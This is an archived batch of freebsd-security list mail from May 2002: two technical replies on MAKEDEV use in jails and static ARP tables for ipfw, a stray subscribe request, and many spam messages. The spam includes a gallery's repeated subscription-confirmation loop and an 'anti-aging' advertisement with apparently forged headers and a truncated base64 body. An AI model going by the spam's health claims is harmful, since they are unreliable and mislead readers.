From owner-freebsd-security Sun May 5 6:15:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by hub.freebsd.org (Postfix) with SMTP id 29A9A37B408 for ; Sun, 5 May 2002 06:15:30 -0700 (PDT) Received: (qmail 13267 invoked by uid 0); 5 May 2002 13:15:28 -0000 Received: from p50910363.dip0.t-ipconnect.de (HELO mail.gsinet.sittig.org) (80.145.3.99) by mail.gmx.net (mp007-rz3) with SMTP; 5 May 2002 13:15:28 -0000 Received: (qmail 81429 invoked from network); 5 May 2002 10:21:35 -0000 Received: from shell.gsinet.sittig.org (192.168.11.153) by mail.gsinet.sittig.org with SMTP; 5 May 2002 10:21:35 -0000 Received: (from sittig@localhost) by shell.gsinet.sittig.org (8.11.3/8.11.3) id g45ALT881416 for freebsd-security@FreeBSD.org; Sun, 5 May 2002 12:21:29 +0200 (CEST) (envelope-from sittig) Date: Sun, 5 May 2002 12:21:29 +0200 From: Gerhard Sittig To: freebsd-security@FreeBSD.org Subject: Re: MAKEDEV not run from `pwd` (was: Jail() in 4.6-pre*) Message-ID: <20020505122129.V1494@shell.gsinet.sittig.org> Mail-Followup-To: freebsd-security@FreeBSD.org References: <003b01c1f399$d7272fe0$0301a8c0@ec.rr.com> <20020504230024.GA46653@darkstar.doublethink.cx> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020504230024.GA46653@darkstar.doublethink.cx>; from jedgar@fxp.org on Sat, May 04, 2002 at 07:00:24PM -0400 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [ should this discussion move to a different list? which one? ] On Sat, May 04, 2002 at 19:00 -0400, Chris Faulhaber wrote: > > [ ... no /path/to/jail/dev/MAKEDEV available ... ] > > This appears to be related to changes made in etc/Makefile revs. > 1.219.2.27/1.247 where NO_MAKEDEV does not install MAKEDEV anymore > instead of only not running 'sh MAKEDEV all'. It appears we need to > MFC src/usr.sbin/jail/jail.8 rev. 1.24 to reflect this. > > For the present time, use: > > # make distribution DESTDIR=$D -DNO_MAKEDEV_RUN > > to get ${jaildir}/dev/MAKEDEV installed (or install it manually) > then rerun: > > # cd $D/dev > # sh MAKEDEV jail There could have been another workaround: MAKEDEV creates all the device nodes in the current directory, but it could easily be invoked without copying it around (after all MAKEDEV will be run in the host environment since jails don't allow to create device nodes). So I thought of a command like `cd $D/dev && sh /dev/MAKEDEV jail`. But having a closer look I see MAKEDEV does some kind of recursion: ----- snip ----- [ ... ] all) sh MAKEDEV std # standard sh MAKEDEV fd0 fd1 # bdev, floppy disk [ ... ] ----- snap ----- Should this read "...; sh $0 std; ..." or "ME=$0; ...; sh ${ME} std; ..." in case parameters get 'shift'ed? Or more cleanly and easier used in the .local case (untested) ----- snip ----- #!/bin/sh MKDEVDIR=`dirname $0` MAKEDEV=${MAKEDEV:-${MKDEVDIR}/MAKEDEV} export MAKEDEV [ ... ] all) sh ${MAKEDEV} std [ ... ] local) umask 0 # XXX should be elsewhere sh ${MAKEDEV}.local umask 77 ;; [ ... ] ----- snap ----- Should I file a conf(?) PR after making sure syntax is correct and test cases work? Who is using the .local hook and can tell wether this file *has* to live next to the MAKEDEV script or should be searched in the `pwd` first before falling back to `dirname $0`? And who else wants to invoke MAKEDEV without or prior to installing it in the target directory where all the device nodes live? mergemaster in prebuild mode maybe (in case the build or install steps need vn nodes or something)? virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 6:15:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by hub.freebsd.org (Postfix) with SMTP id 410F537B409 for ; Sun, 5 May 2002 06:15:30 -0700 (PDT) Received: (qmail 13329 invoked by uid 0); 5 May 2002 13:15:28 -0000 Received: from p50910363.dip0.t-ipconnect.de (HELO mail.gsinet.sittig.org) (80.145.3.99) by mail.gmx.net (mp007-rz3) with SMTP; 5 May 2002 13:15:28 -0000 Received: (qmail 81440 invoked from network); 5 May 2002 10:21:42 -0000 Received: from shell.gsinet.sittig.org (192.168.11.153) by mail.gsinet.sittig.org with SMTP; 5 May 2002 10:21:42 -0000 Received: (from sittig@localhost) by shell.gsinet.sittig.org (8.11.3/8.11.3) id g45ALgG81436 for security@FreeBSD.ORG; Sun, 5 May 2002 12:21:42 +0200 (CEST) (envelope-from sittig) Date: Sun, 5 May 2002 12:21:42 +0200 From: Gerhard Sittig To: security@FreeBSD.ORG Subject: Re: fixed IP <-> MAC assignment (was: ipfw) Message-ID: <20020505122142.W1494@shell.gsinet.sittig.org> Mail-Followup-To: security@FreeBSD.ORG References: <20020505135655.A320@grosbein.pp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020505135655.A320@grosbein.pp.ru>; from eugen@D00015.dialonly.kemerovo.su on Sun, May 05, 2002 at 01:56:55PM +0800 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, May 05, 2002 at 13:56 +0800, Eugene Grosbein wrote: > > On Sat, May 04, 2002 at 08:36:52PM -0700, William J. Borskey wrote: > > > is it possible to write rules for ipfw using ethernet addresses instead of > > ip addresses? > > You can have frozen ARP table and use ip addresses for ipfw > to achieve the same effect. Check this out: > http://www.FreeBSD.org/cgi/query-pr.cgi?pr=kern/36373 Do you want to followup to PR conf/23063 which has the rc.network stuff to setup the static ARP table? In its current form it completely turns off ARP for the interface. You might want to do the sysctl operation instead. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 7:39:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp011.mail.yahoo.com (smtp011.mail.yahoo.com [216.136.173.31]) by hub.freebsd.org (Postfix) with SMTP id 648E737B400 for ; Sun, 5 May 2002 07:39:11 -0700 (PDT) Received: from ool-18bff7bd.dyn.optonline.net (HELO yahoo.com) (davidwagenheim@24.191.247.189 with plain) by smtp.mail.vip.sc5.yahoo.com with SMTP; 5 May 2002 14:39:11 -0000 Message-ID: <3CD54236.4DA21BBE@yahoo.com> Date: Sun, 05 May 2002 10:31:18 -0400 From: David Wagenheim X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: FreeBSD-security@FreeBSD.org Subject: subscribe Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11: 1:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 0860537B404 for ; Sun, 5 May 2002 11:01:46 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45Hxe127590 for ; Sun, 5 May 2002 13:59:40 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA28591; Sun, 5 May 2002 14:05:54 -0400 (EDT) Date: Sun, 5 May 2002 14:05:54 -0400 (EDT) Message-Id: <200205051805.OAA28591@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: Kane Marie Gallery "Chihuly 2002 Art Glass for Mothers Day" MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/html; charset="ISO-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 8bit Chihuly

Chihuly 2002 Art Glass for Mothers Day!

CITRON BASKET
Dale Chihuly
$2,600.00

TIGER LILY SEAFORM PAIR
Dale Chihuly
$4,100.00

 

 

OCEAN MACCHIA
Dale Chihuly
$6,100.00

PHILODENDRON IKEBANA
Dale Chihuly
$6,100.00

 

 

Knane Marie Fine Arts Gallery
2865 Lynnhaven Dr., Suite C-3
Virginia Beach, VA 23451
7 5 7 . 4 9 6 . 5 5 6 7
e-mail: kanemarie@aol.com

| Glass | Jewelry | Painting | Sculpture | American Craft |
| Shows | Directory | Virtual Tour | About the Gallery |

Copyright © 2002, Kane Marie Fine Arts Gallery.  All rights reservered.

---------------------------------------------------------------------------
To be unsubscribed from the Kane Marie Fine Arts Gallery mailing list, simply click on the link below:
Unsubscribe security@freebsd.org


--boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11: 3:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 13FF337B415 for ; Sun, 5 May 2002 11:02:58 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45I0q127789 for ; Sun, 5 May 2002 14:00:52 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA28656; Sun, 5 May 2002 14:07:07 -0400 (EDT) Date: Sun, 5 May 2002 14:07:07 -0400 (EDT) Message-Id: <200205051807.OAA28656@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Removed! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the removal of your email address: security@freebsd.org from the Kane Marie Fine Arts Gallery Subscribe Me mailing list. We're sorry to see you go! If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to add yourself automatically, or click on the link below to automatically re-subscribe yourself: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?a=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11: 4: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 22E8437B408 for ; Sun, 5 May 2002 11:03:50 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45I1i127899 for ; Sun, 5 May 2002 14:01:44 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA28681; Sun, 5 May 2002 14:07:59 -0400 (EDT) Date: Sun, 5 May 2002 14:07:59 -0400 (EDT) Message-Id: <200205051807.OAA28681@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11: 5:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 381E737B41B for ; Sun, 5 May 2002 11:04:57 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45I2p128065 for ; Sun, 5 May 2002 14:02:51 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA28723; Sun, 5 May 2002 14:09:05 -0400 (EDT) Date: Sun, 5 May 2002 14:09:05 -0400 (EDT) Message-Id: <200205051809.OAA28723@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Removed! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the removal of your email address: security@freebsd.org from the Kane Marie Fine Arts Gallery Subscribe Me mailing list. We're sorry to see you go! If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to add yourself automatically, or click on the link below to automatically re-subscribe yourself: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?a=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11: 5:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id AE5BC37B412 for ; Sun, 5 May 2002 11:05:12 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45I37128115 for ; Sun, 5 May 2002 14:03:07 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA28733; Sun, 5 May 2002 14:09:21 -0400 (EDT) Date: Sun, 5 May 2002 14:09:21 -0400 (EDT) Message-Id: <200205051809.OAA28733@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11: 6: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 1BE9637B432 for ; Sun, 5 May 2002 11:05:22 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45I3H128158 for ; Sun, 5 May 2002 14:03:17 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA28747; Sun, 5 May 2002 14:09:31 -0400 (EDT) Date: Sun, 5 May 2002 14:09:31 -0400 (EDT) Message-Id: <200205051809.OAA28747@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11: 7:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id BF90337B416 for ; Sun, 5 May 2002 11:07:05 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45I50128470 for ; Sun, 5 May 2002 14:05:00 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA28868; Sun, 5 May 2002 14:11:14 -0400 (EDT) Date: Sun, 5 May 2002 14:11:14 -0400 (EDT) Message-Id: <200205051811.OAA28868@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Removed! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the removal of your email address: security@freebsd.org from the Kane Marie Fine Arts Gallery Subscribe Me mailing list. We're sorry to see you go! If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to add yourself automatically, or click on the link below to automatically re-subscribe yourself: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?a=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11: 9:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 5ABCF37B407 for ; Sun, 5 May 2002 11:08:30 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45I6O128691 for ; Sun, 5 May 2002 14:06:24 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA28906; Sun, 5 May 2002 14:12:38 -0400 (EDT) Date: Sun, 5 May 2002 14:12:38 -0400 (EDT) Message-Id: <200205051812.OAA28906@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11: 9:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id AC16637B433 for ; Sun, 5 May 2002 11:08:44 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45I6d128730 for ; Sun, 5 May 2002 14:06:39 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA28929; Sun, 5 May 2002 14:12:53 -0400 (EDT) Date: Sun, 5 May 2002 14:12:53 -0400 (EDT) Message-Id: <200205051812.OAA28929@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Removed! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the removal of your email address: security@freebsd.org from the Kane Marie Fine Arts Gallery Subscribe Me mailing list. We're sorry to see you go! If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to add yourself automatically, or click on the link below to automatically re-subscribe yourself: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?a=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11:12:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id 6E25837B401 for ; Sun, 5 May 2002 11:12:07 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45I9v129251 for ; Sun, 5 May 2002 14:09:57 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA29057; Sun, 5 May 2002 14:16:11 -0400 (EDT) Date: Sun, 5 May 2002 14:16:11 -0400 (EDT) Message-Id: <200205051816.OAA29057@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Added! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the addition of your email address: security@freebsd.org to the Kane Marie Fine Arts Gallery Subscribe Me mailing list. If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to remove yourself automatically, or click the link below: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11:13:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from kabru.pinn.net (kabru.pinn.net [198.252.201.11]) by hub.freebsd.org (Postfix) with ESMTP id A469A37B485 for ; Sun, 5 May 2002 11:13:16 -0700 (PDT) Received: from matterhorn.pinn.net (matterhorn.pinn.net [198.252.201.8]) by kabru.pinn.net (8.11.3/8.9.1) with ESMTP id g45IBB129480 for ; Sun, 5 May 2002 14:11:11 -0400 (EDT) Received: (from kanedev@localhost) by matterhorn.pinn.net (8.9.3+Sun/8.8.8) id OAA29125; Sun, 5 May 2002 14:17:25 -0400 (EDT) Date: Sun, 5 May 2002 14:17:25 -0400 (EDT) Message-Id: <200205051817.OAA29125@matterhorn.pinn.net> To: security@freebsd.org From: Kane Marie Fine Arts Gallery Reply-To: Kane Marie Fine Arts Gallery Subject: You've Been Removed! MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=boundary42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --boundary42 Content-Type: text/plain; charset="ISO-8859-1" Content-Transfer-Encoding: 8bit This message is to confirm the removal of your email address: security@freebsd.org from the Kane Marie Fine Arts Gallery Subscribe Me mailing list. We're sorry to see you go! If you feel you have received this notice in error, please visit the Kane Marie Fine Arts Gallery Subscribe Me mailing list at our website: http://www.kanemarie.com to add yourself automatically, or click on the link below to automatically re-subscribe yourself: http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?a=1&l=1&e=security=:freebsd.org Thank you, Kane Marie Fine Arts Gallery --boundary42-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 11:24:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from juno.com (ntserver.sosuo.cz [193.179.195.131]) by hub.freebsd.org (Postfix) with SMTP id 15B6E37B40B; Sun, 5 May 2002 11:24:15 -0700 (PDT) Received: from unknown (HELO mta6.snfc21.pbi.net) (33.51.249.221) by n9.groups.yahoo.com with asmtp; 03 Jan 2000 17:11:40 -1000 Received: from unknown (HELO n9.groups.yahoo.com) (169.23.69.56) by anther.webhostingtalk.com with NNFMP; Mon, 03 Jan 2000 11:07:14 -0400 Received: from [181.124.132.115] by mailout2-eri1.midsouth.rr.com with asmtp; Mon, 03 Jan 2000 12:02:48 -0500 Received: from 209.65.252.63 ([209.65.252.63]) by mx.rootsystems.net with smtp; Mon, 03 Jan 2000 08:58:22 -0200 Reply-To: Message-ID: <025d34b17c2b$6687a8e0$0be30ea5@hcmlvg> From: To: Cc: , Subject: Amazing Anti-Aging Breakthrough Revealed !! 6803hbWv8-78l11 Date: Mon, 03 Jan 2000 06:48:15 -0000 MiME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_00A5_77D74A1C.E7150E82" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_00A5_77D74A1C.E7150E82 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: base64 IFdvdWxkIFlvdSBMaWtlIFRvIExvb2sgJiBGZWVsIDEwLTIwIFllYXJzIFlv dW5nZXI/Pw0KDQpXb3VsZCB5b3UgbGlrZSB0byBpbmNyZWFzZSBNdXNjbGUg U3RyZW5ndGggYnkgODglICYNCnJlZHVjZSBCb2R5IEZhdCBieSA3MiUNCi0g LS1XSVRIT1VUIEVYRVJDSVNFIT8hDQoNCkhvdyBhYm91dCBpbmNyZWFzaW5n IGVuZXJneSBsZXZlbHMgYnkgODQlID8NCk9yIEluY3JlYXNpbmcgU2V4dWFs IFBvdGVuY3kgJiBGcmVxdWVuY3kgYnkgNzUlID8NCg0KQUxMIE9GIFRISVMg SVMgTk9XIFBPU1NJQkxFOiBXZSBvZmZlciB0aGUgTW9zdCBQb3RlbnQNCk9y 